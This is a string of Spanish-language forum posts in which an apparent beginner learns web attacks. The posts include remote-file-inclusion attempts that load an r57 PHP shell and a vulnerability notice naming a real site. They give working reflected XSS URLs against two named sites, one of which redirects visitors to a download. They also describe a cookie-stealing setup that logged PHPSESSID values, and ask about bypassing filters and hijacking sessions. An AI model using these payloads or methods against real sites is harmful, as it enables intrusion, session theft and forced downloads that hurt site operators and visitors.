mm todavia con el ? al final no funciona, seguro que no es vulnerable. 


como verifico esto? es que hace poco que estoy con esto y XSS y estoy bastante en bolas.

me fijè en el codigo fuente de la pagina y creo que puede ser algo de lo que decis


si es esto, como tendria que decir en el codigo fuente para saber que es vulnerable? o que es lo que tendria que detectar ademas de que abra google?

ah y de verdad muchas gracias a los dos por darme una mano 

se que es una shell, lo del troyano es por lo rapido que un troyano pierde su utilidad cuando se hace conocido, y pensaba que con estas shells podria pasar lo mismo.

alguien me podria decir porque esto funciona:

php?url=www.google.com

y esto no funciona

php?url=usuarios.lycos.es/theripperm/shell/r57.txt

este ultimo solo me muestra el contenido del txt y no me ejecuta ninguna shell, pude ser porque dice url, y quizas deberia decir page o file ? o algo asi?

 

quisiera saber si estas shells funcionan generalmente o si en realidad son como los troyanos conocidos que saltan el antivirus al mas minimo indicio. Gracias.

Sitio web: www.lawebdelprgramdor.com
Descubridor: Xvan
URL del aviso:   http://www.lawebdelprogramador.com/news/mostrar_new.php?id=38&texto=Hackers&n1=496610&n2=0&n3=0&n4=0&n5=0&n6=0&n7=0&n8=0&n9=0&n0=0
Fecha de descubrimiento: 25/05/2008
Fecha de notificación: 25/05/2008
Fecha de publicación: 25/05/2008
Arreglado: creo que todavia no
Información adicional: solo hay que modificar el valor del campo "texto" por un script

es un ping tradicional, usas el protocolo ICMP para eso?

Karcrack, conseguiste iniciar sesión por consola o con algún programa? algún ejemplo o detalle para comentar? ese link que diste esta mas avanzado que otros que yo habia visto. Saludos.
 

cuando en una pagina se piden datos.. tambien se pueden insertar scripts ahi no? pero que pasa con las paginas que siempre ponen (") a inicio y al final de la cadena de texto o cuando codifican los caracteres < y > ? estas paginas no son vulnerables o hay tecnicas para saltar estos filtros?

otra cosa sobre los scripts. ¿tambièn se puede hacer con vbscript? y dònde puedo aprender mas sobre scripts?  es muy boba la pregunta, pero quizàs àlguien tenga algùn buen link.

Gracias.

solucionado, Gracias  .



Como se podria hacer eso? aprovechando otro bug? o con un script se puede?



Nu sabia, si hay que borrar el post esta todo bien :]

la web del programador no tiene sistema de usuarios asi que creo que esto no haga ningun mal... si se puede hacer daño aliento a que NO lo hagan eso solo lo hago con el fin de aprender...

esto si funciona:

http://www.lawebdelprogramador.com/news/mostrar_new.php?id=29&texto=<script>alert(5)</script>

esto no funciona:

http://www.lawebdelprogramador.com/news/mostrar_new.php?id=29&texto=<script>alert(vulnerable)</script>

porque? hay que codificar el texto de algun modo? hay algun tipo de filtro?
y que se puede lograr en un ataque de este tipo a una web que no tiene usuarios y passwords? robar cookies no tiene ningun sentido aparente o si ?

----- MINUTOS DEPUES ----

JAJAJA esto es groso jajajjaja

http://www.lawebdelprogramador.com/news/mostrar_new.php?id=29&texto=<script>self.location='http://www.winrar.es/descargas/52';</script>

parece como que descarga el winrar desde la web del programador jajajjaja

esta bueno, perdon por la alegria pero es la primera vez que hago algo asi jajaj

ahora le veo muchas utilidades! 

es verdad, porque esto SI funciona:

http://www.foroswebgratis.com/home-buscador-run.php?buscar=<script>alert()</script>

y mi duda sobre las cookies es asi:

Si las cookies robadas pertenecen a la pagina mediante la cual se esta llevando el ataque, o sea... en este caso solo se pueden robar cookies de la pagina foroswebgratis? o si la persona esta, por ejemplo, tambien logueada en otro foro al mismo tiempo... esas cookies tambien pueden ser robadas? o es necesario una vulnerabilidad similar en la otra pagina?

----------------- Minutos despues ----------------------

segui paso a paso las instrucciones y al usar el codigo en la pagina se crea un archivo log.txt que contiene valores de PHPSESSID, me aprecen 3 y son el mismo valor asi que supongo que son solo de la misma pagina (foroswebgratis)

Pero PHPSESSID no son cookies, no son un valor para definir una sesion? se puede emplear para suplantar la sesion de un usuario?